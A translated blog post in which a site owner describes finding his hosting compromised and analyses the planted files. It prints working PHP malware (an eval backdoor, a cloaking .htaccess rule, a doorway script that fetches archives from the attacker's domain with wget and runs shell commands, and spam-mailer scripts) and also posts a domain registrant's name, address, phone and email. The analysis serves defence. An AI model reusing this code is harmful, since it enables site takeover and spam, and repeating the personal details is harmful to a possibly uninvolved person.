Hello everyone, I am a webmaster and I was hacked
Good day Habr,
The title of course lies, I'm not a webmaster. More precisely, I can not call them after what happened. I will talk about how my hosting was hacked and how I overlooked this event, having noticed only by chance, as well as a little investigation. I hope my experience will be useful. Anyone interested, welcome under cat.
As it turned out
I found out about the hacking completely by chance, because All sites on the hosting worked, opened and looked appropriately decent pages, without too much content. It should be noted that before that I had never used Google Search Console, but only connected Google Analytics. But having created the next page, I decided to try the tool. And so, Search Console is connected to the site and it's time to look at what it can do.
')
One of the functions of the console is Fetch as Google, that is, the launch of a Google bot on the pages of the site, and I immediately let it onto the main site. And then I did not understand anything ... the page opens from the browser, and the bot writes that the page was not found. Something is wrong here, I thought, but I continued to launch the bot, naively believing that Google’s bot had broken.
We understand what happened
Since Search Console does not provide detailed information about the error (which is very sad, in my opinion), I used the http://web-sniffer.net service to emulate the work of the Googlebot and at the same time check if the site is visible from another point on the planet. I set the site *******. **, which should open a single index.php file, drove a captcha and received this very page 404.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL //bootlegger-limiter.php was not found on this server.</p> <p>Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.</p> <hr> <address>Apache Server at *******.** Port 80</address> </body></html> What other bootlegger-limiter.php I thought and quickly connected to the hosting. The fact is that the site *******. ** lies in the subdirectory of the main site (which is in the root). And I really found in the root of bootlegger-limiter.php . And the bot redirected, apparently, Apache. Opened .htaccess , and there added the following lines:
RewriteEngine on RewriteCond %{ENV:REDIRECT_STATUS} 200 RewriteRule ^ - [L] RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) RewriteRule ^(.*)$ bootlegger-limiter.php?$1 [L] In other words, search bots and people who came to the site from search engines showed the page processed in bootlegger-limiter.php .
What a twist. I decided to look for the sake of interest that they showed. Scored in google "site: *******. **":
Ok Google, everything is clear. I was slightly surprised that the Google bot does not check the difference in the contents of the received with the HTTP headers of the bot and the chrome browser, for example. But maybe I'm wrong and it is checked, so the inscription appeared that the site was probably hacked.
In such a simple way you can compromise the site in search engines, and the unsuspecting owner may not notice this. I do not know exactly how the hosting was hacked, because it does not hang sites using CMS. The only site with a popular framework was on Yii, but apparently it has nothing to do with it, because according to the method, it seems that everything was done automatically, and the said framework is difficult to crack without knowing the structure of the site. As it seems to me, the password from my account is just running. Below I will tell you what files they planted on me and what function they performed.
Debriefing worm
So, to begin with the list of cuckoo executable files when they were thrown up and their content:
kfcgmxuu.php - April 3, 2016
<?php $catie ='v]falreE'; $greatly= 'eae';$formulation = '('; $centralization = 'sSLuVSQ_V'; $gummy = 'a';$barrages = ')';$lawyer= ';]s]L'; $craw = '_'; $maisey ='yV]tdiVv'; $juliann='T'; $bridges= 'R'; $betoken= '$';$atheists='R';$eustacia = '^'; $bunting = 'HaSI';$hurleigh ='Rc';$lovingly =')n"th'; $cups = 'et'; $javelin= 'i';$lizard= '('; $chances = '=ej_i'; $leghorn= 'fVRcpr'; $finalized= '('; $expounded=')V'; $bounties='Y'; $bushwhack = 'c';$big= 's6t';$dragging ='('; $appeasable='r'; $frequencies = 'a'; $dolphins ='v_sie"'; $dressers='s$VET'; $heaved='[';$frederique= 'r'; $kettle= 'T'; $fortress ='nU'; $letting ='l';$entrusted='p$i)tE[[e'; $ketti='i'; $coarsest = 'S'; $ashely ='_oZC'; $avrom ='E'; $knower='Te)E:`';$bayonets = 'a)l($ibi';$keying = 'K';$availing =';';$karmen=':T';$ingredient= '[g'; $coincides = '_'; $eyesight= 'v)re'; $iterates ='r[)_c(E'; $dissident='lvek'; $discernibility ='m'; $inclination ='(vrs;_,gS';$characterizes ='e'; $contented= 'r'; $lorrayne= '?'; $archived='g'; $bellowing =';'; $deferrer= '=v(a$,e'; $indiana='fta';$krisiun= '$a$WbqUT'; $gardens= '$i"i_i)'; $evidenced = 'srH';$fruitfulness='"';$f='P'; $bylaw ='ad"v4_ve_';$coriss= '(ElspQ'; $cots= 'esImrvq';$lizard ='a'; $conceived ='y';$arabs=']eOX';$excretion='tu"u';$harmoniously ='r';$figured= ') ';$basful= 'vP(_'; $dapper ='o'; $asks = 'ocnes"';$indira ='t'; $jim ='?'; $coweringly = '$';$incompetent = 'o'; $bitternut = 'gr';$codes = 'd';$grasp='qnOe"$se'; $arachnids = 'VI)i(Q';$elucidate ='dQa'; $husband = $asks['1'] .$bitternut['1'] .$grasp['7'] . $elucidate['2'].$indira.$grasp['7'].$basful['3'] . $indiana[0].$excretion['3'] . $grasp[1] . $asks['1']. $indira. $arachnids['3'].$incompetent. $grasp[1]; $iggy= $figured['1']; $aspirins= $husband($iggy, $grasp['7'] . $basful['0'] .$elucidate['2']. $coriss['2']. $arachnids['4']. $elucidate['2'] .$bitternut['1'] .$bitternut['1'] . $elucidate['2'] .$conceived. $basful['3'] . $coriss['4'] .$incompetent.$coriss['4'] .$arachnids['4']. $indiana[0]. $excretion['3'].$grasp[1].$asks['1'].$basful['3'] .$bitternut[0] . $grasp['7'].$indira .$basful['3'] . $elucidate['2'] . $bitternut['1']. $bitternut[0] . $grasp['6'] .$arachnids['4']. $arachnids['2'] .$arachnids['2'] .$arachnids['2']. $bellowing); $aspirins ($indecomposable['1'],$bylaw['4'] , $arachnids['2'],$basful['1'], $karmen['0'] , $big[1],$evidenced['2'], $coriss['4'] ,$arachnids['2'] ,$grasp['5']. $arachnids['3'].$deferrer['0'] . $elucidate['2'] .$bitternut['1'].$bitternut['1'].$elucidate['2']. $conceived .$basful['3']. $cots['3'] .$grasp['7'].$bitternut['1'] . $bitternut[0] . $grasp['7'] . $arachnids['4'] .$grasp['5']. $basful['3'].$leghorn['2'] .$coriss['1'] . $elucidate['1']. $krisiun['6'] . $coriss['1'] .$inclination['8'] .$krisiun['7'] .$deferrer['5'] . $grasp['5'] . $basful['3'] .$ashely['3'].$grasp['2'] . $grasp['2']. $keying.$arachnids[1] . $coriss['1']. $deferrer['5'] . $grasp['5']. $basful['3']. $inclination['8']. $coriss['1'] . $leghorn['2'].$arachnids['0'].$coriss['1']. $leghorn['2'] .$arachnids['2']. $bellowing . $grasp['5'].$elucidate['2'] . $deferrer['0']. $arachnids['3'] . $grasp['6'] . $grasp['6'] . $grasp['7'] .$indira .$arachnids['4'] . $grasp['5'].$arachnids['3']. $iterates[1] .$grasp['4']. $grasp['7'].$coriss['2']. $basful['0']. $arachnids['3'].$basful['0'] . $grasp['6'] . $basful['0']. $grasp['0']. $grasp['4']. $arabs[0] . $arachnids['2'].$jim .$grasp['5']. $arachnids['3'] .$iterates[1]. $grasp['4'] . $grasp['7'] . $coriss['2'].$basful['0'] .$arachnids['3'].$basful['0']. $grasp['6']. $basful['0'] . $grasp['0'] . $grasp['4']. $arabs[0] . $karmen['0'] .$arachnids['4']. $arachnids['3'] . $grasp['6'] .$grasp['6'] .$grasp['7'].$indira. $arachnids['4'] . $grasp['5'] . $arachnids['3'].$iterates[1]. $grasp['4'] . $evidenced['2']. $krisiun['7'] . $krisiun['7'] . $basful['1']. $basful['3'].$coriss['1'] . $lawyer['4'] . $arachnids['0'].$arachnids[1]. $arachnids['0'] .$inclination['8'] . $arachnids['0'] . $elucidate['1']. $grasp['4'] . $arabs[0] .$arachnids['2']. $jim. $grasp['5'] . $arachnids['3']. $iterates[1].$grasp['4'] . $evidenced['2'].$krisiun['7'] .$krisiun['7'].$basful['1'] . $basful['3'] . $coriss['1'].$lawyer['4'] . $arachnids['0']. $arachnids[1] .$arachnids['0']. $inclination['8'] .$arachnids['0'] .$elucidate['1'].$grasp['4'] .$arabs[0]. $karmen['0'] .$elucidate['0'] . $arachnids['3']. $grasp['7'] .$arachnids['2'] . $bellowing. $grasp['7'] . $basful['0'] .$elucidate['2'] . $coriss['2']. $arachnids['4']. $grasp['6']. $indira. $bitternut['1'] . $bitternut['1']. $grasp['7'] . $basful['0']. $arachnids['4'] . $krisiun['4'] .$elucidate['2'] . $grasp['6'] . $grasp['7']. $big[1].$bylaw['4'] .$basful['3']. $elucidate['0'] . $grasp['7']. $asks['1']. $incompetent . $elucidate['0'] . $grasp['7']. $arachnids['4'] .$grasp['6']. $indira. $bitternut['1'] . $bitternut['1'] . $grasp['7'].$basful['0'].$arachnids['4']. $grasp['5'].$elucidate['2']. $arachnids['2'] .$arachnids['2'].$arachnids['2'] . $arachnids['2'].$bellowing ); .htaccess - April 5, 2016
RewriteEngine on RewriteCond %{ENV:REDIRECT_STATUS} 200 RewriteRule ^ - [L] RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) RewriteRule ^(.*)$ bootlegger-limiter.php?$1 [L] bootlegger-limiter.php - April 5, 2016
<?php $mlksyl="\x63".chr(114)."e".chr(97).chr(116).chr(101)."_"."f".chr(117)."\x6e"."\x63".chr(116)."\x69"."\x6f"."\x6e";$ofanpm = $mlksyl('$a',strrev(';)a$(lave')); $ofanpm(strrev(';))"K0QfJkgCN0XCJkgCNoQD7YWdiRCIvh2YllQCJkgCN0XCJkQCK0QCJkQCJoQDJkQCJkQfJkQCJkgCN0XCJkQCJkgCNsTLtMGJJkQCJkQCJoQD7kiZ1JGJscXZuRCLsFmdkgSZjFGbwVmcp9lc0NXPmVnYkkQCJkQCJkgCNszJ+E2L8ciLy9Gaj5WYk4yJ+IyJuwGJuciI9YWZyhGIhxzJ9cXZuRSCJkQCJkQCK0wOpkSXjRyWztmbpxGJo0WayRHLiwHf8JCKlR2bsBHel1TKy9Gaj5WYkwCbkgCdzlGbJkQCJkQCJoQD7sWYlJnYpADPjRCKgYWaJkQCJkQCJoQD7lCbhZHJgMXYgwWY2pHJog2YhVmcvZWCJkQCJkgCNsTKsFmd6RCKlxmZmVHazlQCJkQCJoQD70FMbNXZoNGdh1GJ9wWY2pHJJkQCJkQCK0wegkSKzVGajRXYtRCIsYWdiRCIsISVpN3LwhXZnVmck8iIowGbh9FajRXYt91ZlJHcoYWaJkQCJkgCNsjI+E2LcxTKq4CK+oSX+41WxwFXp8jKd5DIiwlXbhSK/8jIchSPmVmcopSX+41WzxVY8ICI9ACc4V2ZlJHJJkQCJkgCNsDMy0zYkkCMy4zYkgCImlWCJkQCJoQD7kycr5WasRCKlxmZmVHazlQCJkQCK0wOx0SKztmbpxGJoQnb192YA1zYkkQCJkQCK0wOpMVROlETfdVRO9VRS9kTHl0XFxUSGx3UF5USM9VWUBVTF9FUJt0UfVETJZEL4JXdjRCKlxWamBUPztmbpxGJJkQCJkgCNsXKpgnc1NGJoMHdzlGel9VZslmZAhCImlWCJkQCK0wOiM3clNnLmZmZi4icpR2Yk0DeyV3YkkQCJkgCNoQD7kCbyVncjRCKsJXdj9Vei9VZnFGcfRXZn1jZ1JGJJkQCJoQD701JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJA5SXnQ1UPh0XQRFVIdyWSVkVSV0UfRCQuIyLvoDc0RHai0DbyVncjRSCJkQCK0gCNoQD7V2csVWfJkQCK0wO0lGellQCJkgCNszJ+wWb0h2L84Tek9mYvwzJg8GajVWCJkQCK0wOi4GXiAiLgciPzNXZyRGZh9CPwgDI0J3bQByJg4CIddCVT9ESfBFVUh0JbJVRWJVRT9FJg4CInACdhBiclZnclNFInAiLgkCKu9WazJXZ2BHawBiLgcyLQhEUgcCIuASXnUkUBdFVG90UfJVRWJVRTdyWSVkVSV0UfRCIuAyJ+M3clJHZkFGPnAyboNWZJkQCJoQD7IibcJCIuAyJ+IHa8cCIvh2YllQCJkgCNsjIuxlIg4CIn4DcvwjLyVmdyV2cgMXaoRHIu9GIk5WdvZGI09mbgMXY3ByJg4CIddSSSV1XUNVRVFVRSdyWSVkVSV0UfRCIuAyJgwkUVBCZlR3clVXclJHIlhGV+AHPnAyboNWZJkQCJoQD7IibcJCIuAyJ+EDavwDZuV3bGBCdv5kPxgGPnAyboNWZJkQCJoQD7IibcJCIuAyJ+kHZvJGP+"(edoced_46esab(lave'));?> enthusiasms-raw.php - October 9, 2016
<?php function base64_url_decode($val) { return base64_decode(strtr($val, '-_,', '+/=')); } if(isset($_POST) and count($_POST) > 0){ if(isset($_POST["chk"])){ $val = array(); $val["res"] = 1; print json_encode($val); }else{ $post_data = array_values(array_map('stripslashes', $_POST)); $m_data = explode("|||", base64_url_decode(strrev($post_data[0]))); if(count($m_data) > 1){ $val = array(); if(mail($m_data[0], $m_data[1], $m_data[2], $m_data[3])){ $val["mail"] = 1; } else{ $val["mail"] = 0; } print json_encode($val); } } } if(isset($_GET) and count($_GET) > 0){ $url = ""; $redic = array_values($_GET); foreach(str_split(base64_url_decode($redic[0])) as $letter){ if(rand(1,3) == 1){ $url .= $letter; }else{ $url .= $letter."'+'"; } } ?> <html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>Redirecting</title> <script> var r = '<?php echo $url;?>'; var _0x485b=["\x72\x65\x70\x6C\x61\x63\x65"]; </script> </head> <body onload="location[_0x485b[0]](r);"> Loading... </body></html> <?php } ?> equaling-intangibles.php - October 9, 2016
<?php function base64_url_decode($val) { return base64_decode(strtr($val, '-_,', '+/=')); } if(isset($_POST) and count($_POST) > 0){ if(isset($_POST["chk"])){ $val = array(); $val["res"] = 1; print json_encode($val); }else{ $post_data = array_values(array_map('stripslashes', $_POST)); $m_data = explode("|||", base64_url_decode(strrev($post_data[0]))); if(count($m_data) > 1){ $val = array(); if(mail($m_data[0], $m_data[1], $m_data[2], $m_data[3])){ $val["mail"] = 1; } else{ $val["mail"] = 0; } print json_encode($val); } } } if(isset($_GET) and count($_GET) > 0){ $url = ""; $redic = array_values($_GET); foreach(str_split(base64_url_decode($redic[0])) as $letter){ if(rand(1,3) == 1){ $url .= $letter; }else{ $url .= $letter."'+'"; } } ?> <html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>Redirecting</title> <script> var r = '<?php echo $url;?>'; var _0x485b=["\x72\x65\x70\x6C\x61\x63\x65"]; </script> </head> <body onload="location[_0x485b[0]](r);"> Loading... </body></html> <?php } ?> Let's start with the earliest files that hit the server in April ( kfcgmxuu.php and bootlegger-limiter.php ). Obviously they are obfuscated. Therefore, I brought them into a readable form and looked at what they were doing.
The very first kfcgmxuu.php appeared, this is what it does.
$i = array_merge($_REQUEST,$_COOKIE,$_SERVER); $a = isset($i["elvivsvq"])?$i["elvivsvq"]:(isset($i["HTTP_ELVIVSVQ"])?$i["HTTP_ELVIVSVQ"]:die); eval(strrev(base64_decode(strrev($a))); To the site in cookies, headers, or in arguments with the name elvivsvq, the base64 encoded with MIME is sent and the code is also inverted 2 times and executed. After this point, the attacker gains complete control over the file system of the hosting to which the web server has access. This is a backdoor through which everything else will leak.
Further, with the help of this backdoor, .htaccess is edited and bootlegger-limiter.php is added , and here it is, deobfuscated:
Show code
<?php set_time_limit(0); function get_page_by_curl($url, $useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36") { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); $result = curl_exec($ch); curl_close($ch); return $result; } $doorcontent = ""; $x = @$_POST["pppp_check"]; $md5pass = "e5e4570182820af0a183ce1520afe43b"; $host = @$_SERVER["HTTP_HOST"]; $uri = @$_SERVER["REQUEST_URI"]; $host = str_replace("www.", "", $host); $md5host = md5($host); $urx = $host . $uri; $md5urx = md5($urx); if (function_exists('sys_get_temp_dir')) { $tmppath = sys_get_temp_dir(); if (!is_dir($tmppath)) { $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__)); } $cdir = $tmppath . "/." . $md5host . "/"; $domain = "f.gghijacktest.com"; if ($x != "") { $p = md5(base64_decode(@$_POST["p"])); if ($p != $md5pass) return; $pa = @$_POST["pa"]; if (($x == "2") || ($x == "4")) { echo "###UPDATING_FILES###\n"; if ($x == "2") { $cmd = "cd $tmppath; rm -rf .$md5host"; echo shell_exec($cmd); } $cmd = "cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz"; if ($pa != "") { $pa+=0; $cmd = "cd $tmppath; wget http://update.$domain/arc/" . $md5host . "_" . $pa . ".tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz"; } echo shell_exec($cmd); exit; } if ($x == "3") { echo "###WORKED###\n"; exit; } } else { $curx = $cdir . $md5urx; if (@file_exists($curx)) { @list($IDpack, $mk, $doorcontent, $pdf, $contenttype) = @explode("|||", @file_get_contents($curx)); $doorcontent = @base64_decode($doorcontent); $bot = 0; $se = 0; $mobile = 0; if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT"])) $bot = 1; if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT"])) $mobile = 1; if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER"])) $se = 1; if ($bot) { $pdf+=0; if ($pdf == 1) { header("Content-Type: application/pdf"); } if ($pdf == 2) { header("Content-Type: image/png"); } if ($pdf == 3) { header("Content-Type: text/xml"); } if ($pdf == 4) { $contenttype = @base64_decode($contenttype); $types = explode("\n", $contenttype); foreach ($types as $val) { $val = trim($val); if ($val != "") header($val); } } echo $doorcontent; exit; } if ($se) { echo get_page_by_curl("http://$domain/lp.php?ip=" . $IDpack . "&mk=" . rawurlencode($mk) . "&d=" . $md5host . "&u=" . $md5urx . "&addr=" . $_SERVER["REMOTE_ADDR"], @$_SERVER["HTTP_USER_AGENT"]); exit; } header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found"); echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "\n"; echo '<html><head>' . "\n"; echo '<title>404 Not Found</title>' . "\n"; echo '</head><body>' . "\n"; echo '<h1>Not Found</h1>' . "\n"; echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "\n"; echo '<hr>' . "\n"; echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "\n"; echo '</body></html>'; exit; } else { $crurl = "http://" . @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI']; $buf = get_page_by_curl($crurl); $curx = $cdir . "fff.sess"; if (@file_exists($curx)) { $links = @file($curx, FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); $c = @count($links) - 1; shuffle($links); if ($c > 20) $c = 20; $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>"; if (preg_match_all("/$regexp/siU", $buf, $matches)) { $zval = $matches[0]; shuffle($zval); foreach ($zval as $val) { if ($c < 0) break; list($l, $anchor) = explode("|||", trim($links[$c])); $new = '<a href="' . $l . '">' . $anchor . '</a>'; $buf = str_ireplace($val, $new, $buf); $c--; } } } echo $buf; } } And in short what is happening here. First of all, there is a password check (oddly enough, there seems to be a backdoor without any password, but here). The first block is needed to check if the backdoor worked and to unpack the files. At the time of this writing, the files that are being downloaded from the attacker's server have been deleted.
By the way about the server attacker. Domain is registered as f.gghijacktest.com. By Whois managed to find out that he belongs to the person with the data:
Name : Gabriel Northrup
Address : str. Ivana Cupala 1, Ljubljana NE 4111 SI
Telephone : +714022420218
Email : vlasigor3@gmail.com
Maybe someone knows a person;)
Let's go back to the code. The files from the attacker's server are stored in a temporary directory on the server, I had the folder "~ / tmp" and I found in it a folder named .md5 (my domain), in which the modified pages of my site lay, they are needed only for bots. Those. in the search engine, they appear as my site, but with obscene text. But if a user enters the site’s pages from a search engine, then the pill store was displayed to them at f.gghijacktest.com/lp.php, but the browser address, of course, shows my domain.
All the rest, who came to the site not from search engines, or directly waited, the usual page where they try to replace the links with others, but this did not happen to me because I have not found the corresponding fff.sess file.
And now let's look at .htaccess :
RewriteEngine on RewriteCond %{ENV:REDIRECT_STATUS} 200 RewriteRule ^ - [L] RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) RewriteRule ^(.*)$ bootlegger-limiter.php?$1 [L] Here the most important thing happens, the redirection of bots and people from search engines to the above parsed script. The 2nd and 3rd lines tell you to stop after the first successful application of the rules. The following lines actually define the rules for bots and search engines and redirect them to bootlegger-limiter.php .
As for the other two scripts, enthusiasms-raw.php and equaling-intangibles.php , they are exactly the same and, according to the mail function, are designed to send spam.
Conclusion
In such a simple way an attacker can use your server and you, probably, like me, will not even notice it. It is worth noting that on this server I do not store anything important and therefore I look into it very rarely. But even if I looked more often, then without suspecting anything, I might not have noticed a couple of extra files.
In the comments you can talk about your ways of dealing with such attacks, I think many will be interested.
I hope my experience will be useful, and you will once again check your servers for the presence of such simple backdoors. Thanks for attention.
Source: https://habr.com/ru/post/313332/
All Articles